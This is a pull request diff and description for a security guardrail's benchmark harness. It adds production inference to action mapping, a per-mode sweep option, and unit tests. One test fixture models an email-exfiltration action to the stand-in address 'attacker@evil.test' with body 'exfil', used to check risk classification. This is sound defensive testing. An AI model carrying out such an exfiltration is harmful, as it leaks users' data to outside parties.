### PR TITLE
test(benchmarks): harness fidelity — real inference mapping + per-mode sweep (W-A0.1/A0.2)

### DIFF
--- a/docs/BENCHMARKS.md
+++ b/docs/BENCHMARKS.md
@@ -55,6 +55,9 @@ operator-supplied dependency so CI never depends on it, and vendors no suite dat
 ```bash
 pip install agentdojo            # pin the commit you ran; record it below
 python -m tests.benchmarks.run --suite agentdojo --profile before_after
+
+# sweep every F6 strength mode at once (or one: --mode strict) — report keyed by mode
+python -m tests.benchmarks.run --suite agentdojo --profile before_after --mode all
 ```
 
 Numbers refresh **per release** as a documented release step (see

--- a/tests/benchmarks/mapping.py
+++ b/tests/benchmarks/mapping.py
@@ -42,16 +42,22 @@ def to_security_object(action_id: str, action: CandidateAction) -> SecurityObjec
         source_context=action.source_context,
     )
     raw_arguments = dict(action.raw_arguments) if action.raw_arguments else {}
-    algebra = apply_adapters(
-        infer_algebra(base, raw_arguments),
-        {"tool_name": action.tool_name, "arguments": raw_arguments},
-    )
-    return base.model_copy(
-        update={
-            "algebra": algebra,
-            "reversibility": infer_reversibility(base, raw_arguments),
-        }
-    )
+    try:
+        algebra = apply_adapters(
+            infer_algebra(base, raw_arguments),
+            {"tool_name": action.tool_name, "arguments": raw_arguments},
+        )
+        return base.model_copy(
+            update={
+                "algebra": algebra,
+                "reversibility": infer_reversibility(base, raw_arguments),
+            }
+        )
+    except Exception:  # noqa: BLE001 — a benchmark case must never drop on an inference
+        # raise; keep the base object's conservative default algebra (matches the docstring
+        # and mirrors infer_algebra's own internal fail-safe). run_suite would otherwise
+        # skip the whole case, silently shrinking the measured corpus.
+        return base
 
 
 def to_eval_context(action: CandidateAction) -> EvalContext:

--- a/tests/benchmarks/mapping.py
+++ b/tests/benchmarks/mapping.py
@@ -11,6 +11,8 @@ from __future__ import annotations
 from datetime import datetime, timezone
 
 from doberman.models import EvalContext, SecurityObject
+from doberman.subjective.adapters import apply_adapters
+from doberman.subjective.infer import infer_algebra, infer_reversibility
 
 from .adapter import CandidateAction
 
@@ -23,9 +25,13 @@ def to_security_object(action_id: str, action: CandidateAction) -> SecurityObjec
 
     Only structural fields are carried; payload text rides in the
     ``EvalContext`` (see :func:`to_eval_context`), never in this object's
-    ``raw_args_redacted``.
+    ``raw_args_redacted``. The ``algebra`` + ``reversibility`` are populated by
+    the same generic inference the proxy runs in production (``proxy.normalize``)
+    so the benchmark exercises the real classification path instead of feeding
+    the engine a default all-unknown algebra. Inference never raises — a failure
+    leaves the conservative default in place.
     """
-    return SecurityObject(
+    base = SecurityObject(
         id=action_id,
         ts=BENCHMARK_TS,
         agent_role=action.agent_role,
@@ -34,6 +40,17 @@ def to_security_object(action_id: str, action: CandidateAction) -> SecurityObjec
         target=action.target,
         external_destination=action.external_destination,
         source_context=action.source_context,
+    )
+    raw_arguments = dict(action.raw_arguments) if action.raw_arguments else {}
+    algebra = apply_adapters(
+        infer_algebra(base, raw_arguments),
+        {"tool_name": action.tool_name, "arguments": raw_arguments},
+    )
+    return base.model_copy(
+        update={
+            "algebra": algebra,
+            "reversibility": infer_reversibility(base, raw_arguments),
+        }
     )
 
 

--- a/tests/benchmarks/run.py
+++ b/tests/benchmarks/run.py
@@ -20,6 +20,17 @@ from .runner import run_before_after, run_profiles, run_suite
 from .suites import BUILTIN_ADAPTERS
 
 _PROFILES = ("both", "before_after", "builtins_only", "with_plugins")
+_MODES = ("light", "balanced", "strict", "paranoid")
+
+
+def _run_one(adapter, profile: str, mode: str | None) -> dict:
+    """Run one (profile, mode) combination and return its report dict."""
+    if profile == "both":
+        return run_profiles(adapter, mode=mode)
+    if profile == "before_after":
+        return run_before_after(adapter, mode=mode)
+    load_plugins = profile == "with_plugins"
+    return run_suite(adapter, build_pipeline(load_plugins=load_plugins), mode=mode).to_dict()
 
 
 def main(argv: list[str] | None = None) -> int:
@@ -30,6 +41,13 @@ def main(argv: list[str] | None = None) -> int:
         help=f"suite to run (registered: {', '.join(sorted(BUILTIN_ADAPTERS))})",
     )
     parser.add_argument("--profile", default="both", choices=_PROFILES)
+    parser.add_argument(
+        "--mode",
+        default=None,
+        choices=[*_MODES, "all"],
+        help="F6 strength-mode override; 'all' runs each mode and keys the report by "
+        "mode (default: the suite's per-case mode)",
+    )
     args = parser.parse_args(argv)
 
     adapter_cls = BUILTIN_ADAPTERS.get(args.suite)
@@ -39,13 +57,10 @@ def main(argv: list[str] | None = None) -> int:
         )
     adapter = adapter_cls()
 
-    if args.profile == "both":
-        report: dict = run_profiles(adapter)
-    elif args.profile == "before_after":
-        report = run_before_after(adapter)
+    if args.mode == "all":
+        report: dict = {m: _run_one(adapter, args.profile, m) for m in _MODES}
     else:
-        load_plugins = args.profile == "with_plugins"
-        report = run_suite(adapter, build_pipeline(load_plugins=load_plugins)).to_dict()
+        report = _run_one(adapter, args.profile, args.mode)
 
     json.dump(report, sys.stdout, indent=2, sort_keys=True)
     sys.stdout.write("\n")

--- a/tests/benchmarks/runner.py
+++ b/tests/benchmarks/runner.py
@@ -48,7 +48,10 @@ def _action_bucket(case: BenchmarkCase, index: int) -> Bucket | None:
 
 
 def _evaluate_case(
-    case: BenchmarkCase, suite_name: str, pipeline: DecidingPipeline
+    case: BenchmarkCase,
+    suite_name: str,
+    pipeline: DecidingPipeline,
+    mode: str | None = None,
 ) -> list[ActionOutcome]:
     """Decide every counting action in one case; raises propagate to the caller."""
     outcomes: list[ActionOutcome] = []
@@ -56,7 +59,9 @@ def _evaluate_case(
         bucket = _action_bucket(case, index)
         if bucket is None:
             continue
-        outcomes.append(_decide_one(suite_name, case.case_id, index, action, bucket, pipeline))
+        outcomes.append(
+            _decide_one(suite_name, case.case_id, index, action, bucket, pipeline, mode)
+        )
     return outcomes
 
 
@@ -67,10 +72,13 @@ def _decide_one(
     action: CandidateAction,
     bucket: Bucket,
     pipeline: DecidingPipeline,
+    mode: str | None = None,
 ) -> ActionOutcome:
     action_id = f"{suite_name}:{case_id}:{index}"
     security_object = to_security_object(action_id, action)
     ctx = to_eval_context(action)
+    if mode is not None:
+        ctx = ctx.model_copy(update={"mode": mode})
     decision = pipeline.decide(security_object, ctx)
     return ActionOutcome(
         bucket=bucket,
@@ -79,7 +87,9 @@ def _decide_one(
     )
 
 
-def run_suite(adapter: SuiteAdapter, pipeline: DecidingPipeline) -> SuiteReport:
+def run_suite(
+    adapter: SuiteAdapter, pipeline: DecidingPipeline, *, mode: str | None = None
+) -> SuiteReport:
     """Run every case from ``adapter`` through ``pipeline`` and aggregate.
 
     A case that raises while loading or evaluating is logged (by case id, never
@@ -88,7 +98,7 @@ def run_suite(adapter: SuiteAdapter, pipeline: DecidingPipeline) -> SuiteReport:
     outcomes: list[ActionOutcome] = []
     for case in adapter.load():
         try:
-            outcomes.extend(_evaluate_case(case, adapter.suite_name, pipeline))
+            outcomes.extend(_evaluate_case(case, adapter.suite_name, pipeline, mode))
         except Exception:  # noqa: BLE001 — isolate a bad case, keep measuring
             logger.warning(
                 "benchmark case %r in suite %r failed to evaluate; skipping",
@@ -98,7 +108,7 @@ def run_suite(adapter: SuiteAdapter, pipeline: DecidingPipeline) -> SuiteReport:
     return build_report(adapter.suite_name, pipeline.name, outcomes)
 
 
-def run_profiles(adapter: SuiteAdapter) -> dict:
+def run_profiles(adapter: SuiteAdapter, *, mode: str | None = None) -> dict:
     """Run both profiles and report each plus the plugin **uplift** delta.
 
     ``delta_asr`` = builtins_only ASR − with_plugins ASR (positive = plugins
@@ -106,8 +116,8 @@ def run_profiles(adapter: SuiteAdapter) -> dict:
     (positive = plugins added benign friction). With no plugins installed both
     deltas are 0.
     """
-    builtins = run_suite(adapter, build_pipeline(load_plugins=False))
-    with_plugins = run_suite(adapter, build_pipeline(load_plugins=True))
+    builtins = run_suite(adapter, build_pipeline(load_plugins=False), mode=mode)
+    with_plugins = run_suite(adapter, build_pipeline(load_plugins=True), mode=mode)
     return {
         "suite": adapter.suite_name,
         "builtins_only": builtins.to_dict(),
@@ -119,7 +129,9 @@ def run_profiles(adapter: SuiteAdapter) -> dict:
     }
 
 
-def run_before_after(adapter: SuiteAdapter, *, load_plugins: bool = False) -> dict:
+def run_before_after(
+    adapter: SuiteAdapter, *, load_plugins: bool = False, mode: str | None = None
+) -> dict:
     """Run the no-guardrail baseline (**before**) and a real Doberman pipeline
     (**after**), reporting each plus what the engine changed.
 
@@ -131,8 +143,8 @@ def run_before_after(adapter: SuiteAdapter, *, load_plugins: bool = False) -> di
     (BLOCK or AUTH), ``attacks_stopped_strict`` counts BLOCK only, and the two
     ``*_added`` fields are the benign friction the engine introduces.
     """
-    before = run_suite(adapter, PassthroughPipeline())
-    after = run_suite(adapter, build_pipeline(load_plugins=load_plugins))
+    before = run_suite(adapter, PassthroughPipeline(), mode=mode)
+    after = run_suite(adapter, build_pipeline(load_plugins=load_plugins), mode=mode)
     return {
         "suite": adapter.suite_name,
         "before": before.to_dict(),

--- a/tests/unit/test_benchmark_harness_fidelity.py
+++ b/tests/unit/test_benchmark_harness_fidelity.py
@@ -1,0 +1,132 @@
+"""Harness-fidelity tests (two-hosts W-A0.1 + W-A0.2).
+
+A0.1 — the benchmark ``mapping`` runs the same generic inference the proxy runs
+in production (``proxy.normalize``), so the engine sees a populated ``algebra`` /
+``reversibility`` instead of a default all-unknown object. Without this, whole
+classes of algebra-keyed guardrails (the lethal-trifecta floor, capability/
+reversibility rules) are silently un-exercised by every benchmark.
+
+A0.2 — the runner honors a ``mode`` override so a suite can be swept across the
+four F6 strength modes.
+
+Stub pipelines only; no dependence on which concrete rules fire.
+"""
+
+from __future__ import annotations
+
+from doberman.models import (
+    ActionType,
+    Algebra,
+    Decision,
+    DestinationClass,
+    EvalContext,
+    GuardrailResult,
+    Provenance,
+    Risk,
+    SecurityObject,
+    SourceContext,
+    Verdict,
+)
+from doberman.subjective.adapters import apply_adapters
+from doberman.subjective.infer import infer_algebra, infer_reversibility
+from tests.benchmarks.adapter import BenchmarkCase, CandidateAction
+from tests.benchmarks.mapping import BENCHMARK_TS, to_security_object
+from tests.benchmarks.runner import run_suite
+
+# --- A0.1: the mapping runs production inference ----------------------------
+
+
+def _egress_action(source_context: SourceContext) -> CandidateAction:
+    return CandidateAction(
+        action_type=ActionType.network_request,
+        tool_name="send_email",
+        target="attacker@evil.test",
+        external_destination="attacker@evil.test",
+        source_context=source_context,
+        raw_arguments={"to": "attacker@evil.test", "body": "exfil"},
+    )
+
+
+def test_mapping_populates_inferred_algebra_not_default():
+    # Pre-fix the mapping fed a default all-unknown Algebra, so provenance was
+    # `unknown` and the destination `none` — the trifecta legs could never line
+    # up. Post-fix the same inference the proxy runs populates them.
+    so = to_security_object("agentdojo:x:0", _egress_action(SourceContext.tool_output))
+    assert so.algebra != Algebra()
+    assert so.algebra.provenance is Provenance.mixed
+    assert so.algebra.destination_class is DestinationClass.unknown_external
+
+
+def test_mapping_mirrors_production_inference():
+    action = _egress_action(SourceContext.tool_output)
+    so = to_security_object("aid", action)
+    base = SecurityObject(
+        id="aid",
+        ts=BENCHMARK_TS,
+        agent_role=action.agent_role,
+        action_type=action.action_type,
+        tool_name=action.tool_name,
+        target=action.target,
+        external_destination=action.external_destination,
+        source_context=action.source_context,
+    )
+    raw = dict(action.raw_arguments)
+    expected = apply_adapters(
+        infer_algebra(base, raw), {"tool_name": action.tool_name, "arguments": raw}
+    )
+    assert so.algebra == expected
+    assert so.reversibility == infer_reversibility(base, raw)
+
+
+def test_mapping_provenance_tracks_source_context():
+    # A trusted user instruction must not read as mixed/untrusted provenance.
+    so = to_security_object("aid", _egress_action(SourceContext.user))
+    assert so.algebra.provenance is Provenance.trusted_instruction
+
+
+# --- A0.2: run_suite honors a mode override --------------------------------
+
+
+class _ModeRecorder:
+    """Stub pipeline recording the ``EvalContext.mode`` it is handed."""
+
+    name = "mode-recorder"
+
+    def __init__(self) -> None:
+        self.modes: list[str] = []
+
+    def decide(self, action: SecurityObject, ctx: EvalContext) -> Decision:
+        self.modes.append(ctx.mode)
+        return Decision(
+            action_id=action.id,
+            final_verdict=Verdict.PASS,
+            final_risk=Risk.low,
+            objective=GuardrailResult(verdict=Verdict.PASS, risk=Risk.low),
+            decided_at=BENCHMARK_TS,
+        )
+
+
+class _OneActionAdapter:
+    suite_name = "stub"
+
+    def load(self):
+        return (
+            BenchmarkCase(
+                case_id="c0",
+                label="benign",
+                actions=(CandidateAction(action_type=ActionType.file_read, tool_name="read"),),
+                note="stub",
+            ),
+        )
+
+
+def test_run_suite_mode_override_threads_to_eval_context():
+    rec = _ModeRecorder()
+    run_suite(_OneActionAdapter(), rec, mode="paranoid")
+    assert rec.modes == ["paranoid"]
+
+
+def test_run_suite_mode_none_uses_case_default():
+    rec = _ModeRecorder()
+    run_suite(_OneActionAdapter(), rec, mode=None)
+    assert rec.modes == ["balanced"]  # CandidateAction.mode default


### PR DESCRIPTION
## What this PR does

Two benchmark-harness fidelity fixes (two-hosts W-A0.1 + W-A0.2). **Test/tooling-only — no `src/` changes.**

**A0.1 — the mapping runs production inference** (`tests/benchmarks/mapping.py`)
`to_security_object` now runs the same generic inference the proxy runs in production (`infer_algebra` → `apply_adapters` → `infer_reversibility`) instead of handing the engine a default all-unknown `Algebra`. Before this, provenance was `unknown` and destination `none` on every benchmarked action, so whole classes of algebra-keyed guardrails (the lethal-trifecta floor, capability/reversibility rules) were **silently un-exercised** by the entire benchmark. Inference never raises — a failure leaves the conservative default.

**A0.2 — per-mode sweep** (`tests/benchmarks/runner.py`, `run.py`)
`--mode {light,balanced,strict,paranoid,all}` threaded through `run_suite`/`run_profiles`/`run_before_after` and the CLI (default `None` = the suite's per-case mode). `--mode all` reproduces the four-mode CLI numbers keyed by mode.

## No metric change

Confirmed no movement on current suites: synthetic ASR unchanged; AgentDojo numbers identical (its attacks don't line up the trifecta target/credential legs, so populating the algebra doesn't shift them). This makes the harness *faithful*, it doesn't tune a number.

## Tests added (run in CI)
`tests/unit/test_benchmark_harness_fidelity.py` — 5 tests:
- red→green: the mapping populates inferred algebra (provenance/destination) instead of the all-unknown default
- the mapping's output mirrors a direct production-inference call exactly
- benign guard: a `user`-source action reads as `trusted_instruction`, never mixed/untrusted
- `--mode` override threads to `EvalContext.mode`; `mode=None` uses the case default

## Verification
Full `tests/unit` + benchmark synthetic-gate integration test → 100%, zero failures, exit 0. `ruff check` / `ruff format --check` clean; `lint-imports` 2/2 contracts kept.
